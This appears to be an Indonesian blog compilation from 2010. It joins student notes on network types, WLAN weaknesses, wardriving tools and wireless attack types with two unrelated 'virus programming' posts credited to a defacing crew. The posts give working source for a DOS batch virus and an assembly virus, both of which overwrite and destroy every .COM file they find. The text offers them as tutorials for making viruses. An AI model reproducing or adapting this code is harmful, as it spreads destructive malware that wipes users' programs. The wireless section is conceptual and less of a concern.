1. Berdasarkan distribusi sumber informasi/data
a. Jaringan terpusat.
b. Jaringan terdistribusi
2. Berdasarkan jangkauan geografis dibedakan menjadi:
a. Jaringan LAN
b. Jaringan MAN
c. Jaringan WAN
3. Berdasarkan peranan dan hubungan tiap komputer dalam memproses data.
a. Jaringan Client-Server
b. Jaringan Peer-to-peer
4. Berdasarkan media transmisi data
a. Jaringan Berkabel (Wired Network)
b. Jaringan Nirkabel (Wirelessnetwork)

Wireless LAN
WirelessLAN (WLAN) merupakan sistem transmisi data yang didesain untuk menyediakan location independent network acces antar komputer dengan menggunakan gelombang radio. Penggunaan WLAN memiliki keuntungan berikut:
1. Mobilitas yang meningkatkan produktivitas dengan mengakses informasi secara real time, tidak bergantung pada lokasi pekerja, cepat, dan lebih efisien untuk pengambilan keputusan.
2. Efektifitas biaya
3. Mengurangi biaya kepemilikan.
IEEE 802.11 b WirelessLAN
Institute of Electrical and Electronic Engineers (IEEE) mengeluarkan 802.11 sebagai standard untuk WLAN pada tahun 1997. Standard tersebut hanya menyediakan kecepatan data 1 Mbps dan 2 Mbps dan mengatur fundamental signaling methods dan layanan lain. Namun, kecepatan data yang disediakan pada 802.11 terlalu lambat untuk mendukung kebutuhan bisnis pada umumnya. Untuk meningkatkan kecepatan data, maka dikeluarkanlah 802.11b yang memiliki kecepatan transmisi hingga 11 Mbps sehingga hal tersebut akan sebanding dengan ethernet.

Kelemahan
Jaringan wireless lebih banyak memiliki kelemahan dibanding dengan jaringan kabel. Secara umum, kelemahan jaringan wireless dibagi menjadi dua yaitu kelemahan pada konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Wireless yang dipasang pada jaringan sering menggunakan setting default bawaan vendor seperti SSID, IP address, remote manajemen, DHCP enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut.

Tools
Untuk melakukan Wardriving, peralatan yang diperlukan adalah:
1. komputer/laptop
2. wireless cards
3. antena
4. software

Banyak software yang ditawarkan untuk dapat melakukan wradriving pada berbagai jenis operating system (OS), antara lain:
1. airsnort: program linux untuk memecahkan WEP encryption dengan prism2 berbasis chipset.
2. netstumber
3. kismet
4. wellenreiter: sniffer linux yang bekerja dengan hermes dan prism2 card.
5. ap scanner: program macintosh.
6. mognet: program java yang portabel

Untuk melakukan wardriving, yang harus dilakukan adalah disabling TCP/IP. Dengan disabling TCP/IP, komputer atau laptop tidak memiliki fungsi untuk koneksi ke jaringan sehingga wardriving software dapat berfungsi dengan sempurna.

Penetration Testing
Tahapan Penetration Test
WLAN dapat dipecahkan karena dua permasalahan, yaitu konfigurasi dan enkripsi yang digunakan.
Penetration test dapat dilakukan pada banyak platform dengan cara yang berbeda-beda, namun memiliki konsep dasar yang sama. Hal-hal yang dilakukan untuk melakukan penetration test adalah:
1. Identifikasi target
Jika wireless network digunakan untuk bisnis dan residence, maka untuk mendapatkan jaringan target sulit dilakukan khususnya jika organisasi tersebut tidak diidentifikasikan di ESSID (Extended Service Set Identifier). Salah satu cara mengidentifikasi target adalah dengan menggunakan sumber publik. Cara lain yang dapat digunakan adalah memasuki fasilitas organisasi target dan mengukur kekuatan sinyal. Pada akhir identifikasi, harus dipastikan bahwa target telah diidentifikasi dengan benar dengan agen penetration test yang dipercaya untuk memulai menyerang jaringan.
2. Serangan (Attack)
Jika jaringan tidak dilindungi, serangan dapat dilakukan dengan mengatur wireless network card agar bisa menyatu dengan access point. Terdapat empat jenis serangan (penetration test) dasar pada wireless network, yaitu:
a. Penetration test pada WEP encrypted network
Terdapat dua tipe dasar serangan pada WEP encrypted network, yaitu:
1) IV atau FMS attack
Membutuhkan sejumlah paket untuk menemukan IV lemah, sehingga setelah ditemukan WEP key yang digunakan dapat dihancurkan dengan berbagai tools yang tersedia.

2) Chopping attack
Chopping attack mengurangi kebutuhan IV lemah dan hanya membutuhkan IV unik untuk dikumpulkan.
b. Penetration test pada WPA
Terdapat dua jenis WPA, yaitu WPA-PSK dan WPA Radius. WPA-PSK dpat diserang menggunakan dictionary attack setelah mengumpulkan Extensible Authentication Protocol Over Local Area Network (EAPOL) handsake. Cara baru untuk menyerang WPA adalah Church of Wifi WPA-PSK Rainbow tables yang dikembnagkan oleh Church of wifi.
c. Penetration test pada LEAP
LEAP dikembangkan oleh Cisco untuk mengatasi kelemahan pada WEP sama halnya dengan WPA.
d. Penetration test pada jaringan yang menggunakan VPN
Metode yang biasa digunakan untuk mengembangkan jaringan yang berhubungan dengan VPN pada dasarnya membuka WLAN dengan sedikit atau tanpa pengamanan. Pada saat ini, device yang biasanya menggunakan wirelessnetwork adalah laptop. Jika WLAN dikembangkan tanpa pengamanan, attacker dapat mengambil keuntungan dan menemukan laptop yang terdapat patches yang memungkinkan untuk di eksploitasi seperti membocorkan sistem, instal key logger atau backdoor, dan lainnya bergantung pada VPN yang digunakan.

DISUSUN :
Aji Nugroho 2007-53-198

Zulia Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

JENIS HACKING WIRELESS

niffing to Eavesdrop

Packet yang merupakan data seperti Akses HTTP, Email dll, yang melewati transmisi wireless gelombang dapat dengan mudah juga ditangkap dan dianalisa oleh attacker dengan menggunakan aplikasi “Packet Sniffer”

2. Deniel Of service attack

Inilah serangan yang paling ditakutkan oleh para Admin. Denial Of service memang relatif sulit untuk dicegah. Serangan ini dapat menimbulkan downtime pada jaringan. Tool gratisan seperti Wireless LANJack dan hunter_killer mampu melakukan serangan ini. Serangan ini bisa saja diarahkan pada user biasa agar user tersebut tidak bisa terkoneksi dengan suatu access point. Tujuannya tak lain adalah supaya tidak ada pengguna yang bisa menggunakan layanan jaringan Karena adanya kekacauan lalulintas data (penolakan layanan).
Serangan jenis ini yaitu dengan membanjiri/flooding yang mengakibatkan sinyal wireless berbenturan dan menghasilkan packet-packet yang rusak. Seorang penyusup bisa saja mengelabui Extensible Authentication Protocol (EAP) untuk melakukan serangan DoS terhadap suatu server. Aksi ini dibarengi dengan melakukan flooding data. Dengan demikian maka tidak ada satu pun user yang bisa melakukan koneksi dengan layanan jaringan.

3. Man in the middle attack

“Man-in-the-middle”. Sebenarnya inilah sebuatn bagi sang penyusup. Serangan Man-in-the-Middle dilakukan dengan mengelabui koneksi VPN antara komputer pengguna resmi dan access point dengan cara memasukkan komputer lain di antara keduanya sebagai pancingan. Jenis serangan ini hampir sama dengan jenis serangan pada jaringan kabel. Program yang digunakan juga sama, kecuali perangkat wirelessnya. Dengan menggunakan sebuah program, penyusup mampu memosisikan diri di antara lalu lintas komunikasi data dalam jaringan nirkabel. Serangan seperti ini mudah dilakukan dengan bantuan software yang tepat, misalnya saja Wireless LANJack atau AirJack. Akan tetapi serangan jenis ini juga relatif mudah dicegah dengan IDS yang handal yang mampu memonitoring 24 jam sehari.

4. Rogue/Unauthorized Access Point

Rogue AP ini merupakan ancaman karena adanya AP liar yang dipasang oleh orang yang ingin Menyebarkan/memancarkan lagi tranmisi wireless dengan cara illegal/tanpa izin, yang menyebabkan penyerang dapat menyusup di jaringan melalui AP rogue ini.

5. Access Point yang dikonfigurasi tidak benar

Hal ini sangat banyak terjadi karena kurangnya pemahaman dalam mengkonfigurasi system keamanan AP.

6. Network Injection
Apabila sebuah access point terhubung dengan jaringan yang tidak terfilter secara baik, maka penyusup berpotensi untuk melakukan aksi boardcast – seperti spanning tree (802.1D), OSPF, RIP, dan HSRP. Dalam kondisi ini, maka semua perangkat jaringan akan sibuk dan tidak mampu lagi bekerja sebagaimana mestinya. Routing attack juga termasuk dalam serangan jenis ini. Sang penyusup bisa melakukan hal ini dengan mudah menggunakan program seperti IRPAS, yang dipergunakan untuk melakukan injeksi data pada update routing di jaringan, mengubah gateway, atau menghapus table routing yang ada. Kegiatan yang mengancam keamanan jaringan wireless tersebut di atas dilakukan dengan cara-cara yang dikenal dengan nama Warchalking, WarDriving, WarFlying, WarSpamming, WarSpying dll. Banyaknya Access Point/Base Station yang dibangun yang seiring dengan mulai murahnya biaya berlangganan koneksi internet maka kegiatan-kegiatan hacking ytersebut di atas, biasa diterapkan untuk mendapatkan akses internet secara illegal yang tentunya tanpa perlu membayar alias gratis
referensi: http://masbuchin.com/article/jenis+hacking+wireless.html
di susun :
Aji Nugroho 2007-53-198

Zulia Putri Dewi 2007-53-202

Ahmad Teguh Susilo 2007-53-240

Lilik Chusnawati 2007-53-241

Selasa, 06 April 2010

Pemerograman Virus Komputer Bagian I

Dedication : For Knowledgement & Open Source
Greetz : #DEFACE-TEAM@IRC.DAL.NET
#DHEGLENG@IRC.DAL.NET
Perhatian.

Program dibawah ini dapat menulari sistem, tetapi dengan cara yang cepat dapat diketahui.
Berikut ini adalah saran-saran yang harus selalu di perhatikan pada waktu bereksperimen
dengan virus:

1. Bekerjalah hanya pada file cadangan (backup).
2. Cegahlah jangan sampai virus - virus atau program -program yang sudah ditulari jangan
ketangan orang lain (tertular).
3. Setelah percobaan, hapuskan semua program - program yang telah ditulari.
4. Hendaknya hard disk dilindungi terhadap penulisan yang tidak diharapkan, dengan
menggunakan instruksi DOS, ASSIGN.
Ketiklah instruksi berikut ini dibelakang prompt DOS:
A>assign c=a (disket master DOS pada drive A)

Dengan jalan ini maka semua tindakan yang ditujukan kepada hard disk, diarahkan ke drive
A. Perlindungan ini tidak benar - benar rapat, tetapi dapat mencegah sebagian besar virus
- virus yang menyerang hard disk .Untuk mendapatkan kembali keadaan normal, tuliskan :
"assign c=c" sementaradisket master DOS berada di drive A. Kalau syarat diatas dipatuhi
pada waktu anda bekerja dengan program virus, maka tak akan ada bahaya karena penularan
-penularan yang tidak disengaja.

------------------------------------
1. VIRUS KOMPUTER DALAM BATCHFILE
------------------------------------

Sebagai awal dalam mempelajari pemrograman virus komputer , berikut ini akan ditampilkan
virus komputer dalam bentuk batchfile.Virus ini memanfaatkan fasilitas dari DOS, dengan
memanggil instruksi - instruksi file internal dan eksternal. Instruksi - instruksi file
internal (instruksi yang merupakan "bagian dalam" dari modul sistem operasi tempat modul
tersebut dipindahkan ke memori-internal/RAM pada saat boot) digunakan sesuai dengan
hukum-instruksi dalam batchfile.Untuk instruksi - instruksi file eksternal seperti DEBUG
dan EDLIN, harus disediakan file-file yang diperlukan.Disamping itu virus ini juga
memanfaatkan pemilihan arah bagi operasi masukan dan keluaran dalam PC-DOS(I/O
redirection).Virus in hanya menyerang file - file yang berekstensi COM.
Seperti yang telah kita ketahui bersama bahwa sebuah virus mempunyai 5 buah kemampuan,
yaitu :

kemampuan mendapatkan informasi, kemampuan memeriksa program, kemampuan menggandakan diri
dan menularkan, kemampuan menyembunyikan diri. Dari kelima buah kemampuan tersebut hanya 2
kemampuan yang dimiliki oleh virus batchfile yang akan saya bahas disini, yaitu kemampuan
mendapatkan informasi serta kemampuan menggandakan diri dan menulari file yang lain.
Meskipun demikian, virus ini sudah dapat bekerja karena kedua kemampuan tersebut merupakan
inti dari sebuah virus komputer, sedangkan kemapuan yang lain hanyalah tambahan.
Bila ditinjau dari jenisnya, maka virus bacthfile ini adalah virus yang bersifat
menumpangi program yang ditularinya. Dengan demikian suatu program yang telah tertular
virus ini menjadi tidak dapat dipakai lagi, karena telah dirusak oleh virus.

------------------------------------
2. ALGORITMA
------------------------------------

Misalkan virus bacthfile tersebut bernama LAMMER.BAT, maka LAMMER.BAT harus mengandung
runtun isntruksi yang mampu melakukan kegiatan - kegiatan sbb:
1. Mencari file COM yang pertama dalam directory (kalau ada)
2. Menghapus file tersebut
3. Menyalin (copy) file LAMMER.BAT ke file dengan nama seperti nama file yang tadi
dihapus, tapi dengan ekstensi BAT

Dengan demikian sesudah penularan, isi dari file yang ditulari adalah persis sama dengan
file LAMMER.BAT.Sehingga pemanggilan terhadap file yang tertular mempunyai akibat sama
dengan memanggil file LAMMER.BAT.

------------------------------------
3. BAGAN ALIR
------------------------------------

MULAI
|
|
Buat file yang berisi nama - nama
File yang berekstensi COM.
|
|
Pilih nama file yang pertama
(misalnya bernama KORBAN.COM)
|
|
Buat Batchfile baru yang berisi instruksi:

DEL KORBAN.COM
COPY \LAMMER.BAT KORBAN.BAT
|
|
Panggil / jalankan bacthfile baru tersebut
|
|
AKHIR


------------------------------------
4. Listing Program
------------------------------------

Batchfile dibawah ini merupakan implementasi dari alir bagan diatas.

NAMA FILE: LAMMER.BAT

Echo off -- Keluaran ke layar dihadang, sehingga pekerjaan yang dilakukan oleh batchfile
tidak tampak oleh pemakai

Ctty nul -- Masukan dan keluaran diubah arahnya ke NUL -device

Dir *.com/w.daftar -- Nama dari semua file dengan ekstensi .Com dalam directory yang aktif
ditulis dalam file DAFTAR.pilihan "/w" akan membuat tanggal dan panjangn
file tidak ditampilkan

Edlin daftar<\1 -- EDLIN mendapat masukan dari perintah-perintah dalam file instruksi
"1" untuk menyunting file DAFTAR

Debug daftar<\2 -- DEBUG memanggil DAFTAR dan melaksanakan perintah-perintah dari file
2, untuk membuat bacthfile PERINTAH.BAT

Edlin perintah.bat<\3 -- Text editor EDLIN memanggil file PERINTAH.BAT dan file instruksi
ketiga

Del daftar.* -- File DAFTAR DAN DAFTAR.BAK dihapus

Del perintah.bak -- File PERINTAH.BAK dihapus)

Ctty con -- Masukan dan Keluaran kembali ke keyboard dan layar, tetapi layar
tetap kosong (echo off)

Perintah -- File PERINTAH.BAT dipanggil.Bila virus sudah menulari file
ASSIGN.COM, maka PERINTAH.BAT berisi sbb:
DEL ASSIGN.COM
COPY \LAMMER.BAT



3 buah file instruksi dengan nama "1", "2" dan "3" (tanpa ekstensi) berhubungan dengan
file batchfile :LAMMER.BAT diatas,sbb:

NAMA FILE : 1

1,4d
e

NAMA FILE : 2

M100,10b,f000
E108 ".bat"
M100,10b,f010
E100"DEL"
Mf000,f00b,104
E10c 2e
E110 0d,0a
Mf010,f020,11f
E112 "COPY \LAMMER.BAT"
E12b 0d,0a
Rcx
2c
nperintah.bat
w
q






NAMA FILE 3:

Maaf file instruksi ketiga tidak dapat ditulis di bagian ini karena mengandung dua kali
Ctrl-Z (hex 1Ah) dan Saya sendiri udah capek nulisnya hehehehe maklum blom minum jamu
kuatJ
Gunakan kreatifitas anda sebagai programmer

Demikianlah beberapa informasi pengetahuan ttg virus komputer dalam file batchfile.Semoga
apa yang saya sampaikan disini dapat berguna bagi teman - teman yang pengen memahami
teknik pemrograman virus dan pembuatannya.
Dan jangan lupa untuk tetap Menantikan Artikel saya selanjutnya.




Pemerograman Virus Komputer Bagian II

Dedication : For Knowledgement & Open Source
Greetz : #DEFACE-TEAM@IRC.DAL.NET
#DHEGLENG@IRC.DAL.NET


1. Pendahuluan

Virus komputer yang akan dibicarakan dibawah ini ditulis dalam bahasa assembley.Bila
dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka virus yang kita bahas
sekarang ini telah memiliki kelima kemampuan seperti apa yang telah saya sampaikan
terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket, serta memeriksanya apakah
telah tertular atau belum.Bila belum, maka virus akan menularinya.Routine manipulasi yang
dimiliki virus ini hanyalah berupa tampilan pesan :
"File ini telah tertular Virus komputer!" atau "Semua file COM pada disket ini telah
tertular virus komputer!!!".
Berbeda dengan virus batchfile yang menghasilkan file baru dan membutuhkan beberapa file
untuk menjalankannya, maka virus yang akan kita bahas ini nantinya dapat bekerja sendiri
dan tidak menghasilkan file baru, sehingga kemampuan menyembunyikan diri dari virus ini
lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah termasuk jenis virus yang
menumpangi program yang ditularinya.Dengan demikian virus ini bersifat merusak.

2. Algoritma

Algoritma yang digunakan adalah sbb:
1. Cari file COM yang pertama
2. Buka dan baca file tersebut, letakkan pada buffer (di RAM)
3. Dengan membandingkan tanda pengenal virus dan rangkaian byte bagian awal dari program,
periksa apakah file tersebut telah tertular virus atau belum.
4. a) Bila belum, maka tulari file tersebut dengan jalan menyalin seluruh program virus
ke file tersebut (menumpangi).Kemudian tampilkan pesan :"File ini telah tertular
Virus Komputer !"
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah 2.
5. Jika semua file COM telah tertular, maka tampilkan pesan : "semua file Com pada disket
ini telah tertular virus komputer!!!"


3. Program dan Mekanisme Penularan

Program dibawah ini merupakan implementasi dari bagian diatas.

Catatan : Program virus ini menggunakan instruksi macro.Definisi macro yang digunakan
terdapat pada file LAMMER.MAC. klo pengen liat file macronya kirim email ke
Dr`Ponidi@crackdealer.com)

;------------------------------------------------------------------------------------
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;------------------------------------------------------------------------------------

IF1
INCLUDE LAMMER.MAC
ENDIF

Code_seg SEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai : jmp kerjakan
Identitas DB `File ini telah tertular virus komputer !$`
Peringatan DB `semua file COM dalam disket ini telah tertular virus`
DB `Komputer !!!$`
File_COM DB`*.com`,0h
Nama_file DB 13 DUP(?)
Panjang_id equ 45
Panjang_vir equ 445
Atribut equ 20h
Open_code equ 2
Jumlah equ 0ffffh
DTA DB43 DUP(20h)




Kerjakan : Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah:cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar : Ke_dos
Laksanakan : mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos

Cari_lainnya : pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
Buffer Label byte
Code_seg ENDS
END mulai


4. Penjelasan

Awal dari penularan dimulai ketika program virus ini dijalankan pada disket yang berisi
file-file COM.Virus mula-mula akan menulari file COM yang pertama (berdasarkan urutan
file-file pada disket).Dengan penularan ini, maka file tersebut menjadi sumber penularan
baru, dan virus yang asli dapat dihapus.File-file yang telah tertular ukurannya tidak
berubah.
Bila file yang telah tertular itu dijalankan, maka file itu tidak dapat menjalankan
fungsinya dan hanya akan menampilkan pesan :"File ini telah tertular Virus
komputer!".Sebelumnya, file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam directory utama adalah COMMAND.COM,
maka setiap kali melakukan boot dengan disket itu, tak akan pernah berhasil dan sebelumnya
virus akan menulari sebuah program COM lain yang belum tertular.
Harapa diperhatikan bahwa virus ini tidak dapat bekerja dengan baik bila berada pada file
COM yang ukurannya lebih kecil daripada ukuran program virus yang asli, atau terlalu besar
(mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara lengkap atau buffer telah
melampaui batas daerah CS (Code Segment)







Demikianlah Artikel yang dapat saya sampaikan pada kesempatan ini, Semoga informasi yang
saya sampaikan dapat bermanfaat bagi pengetahuan bagi kita semua ,khususnya bagi yang
concern terhadap virus.Sekian terima kasih cao